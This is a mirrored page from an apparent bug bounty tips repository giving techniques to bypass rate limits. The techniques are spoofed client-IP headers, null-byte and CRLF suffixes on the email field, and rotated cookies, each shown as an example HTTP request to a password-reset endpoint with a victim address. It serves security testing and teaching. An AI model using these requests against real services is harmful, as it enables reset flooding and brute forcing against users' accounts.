mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-25 05:45:26 +00:00
753e0e5031
Create Rate Limit Tips and add 3 tips
807 B
807 B
Bypass Rate Limit
- Try add some custom header
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
For example:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
- Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
- Try changing user-agents, cookies and IP address
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
Try this to bypass
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com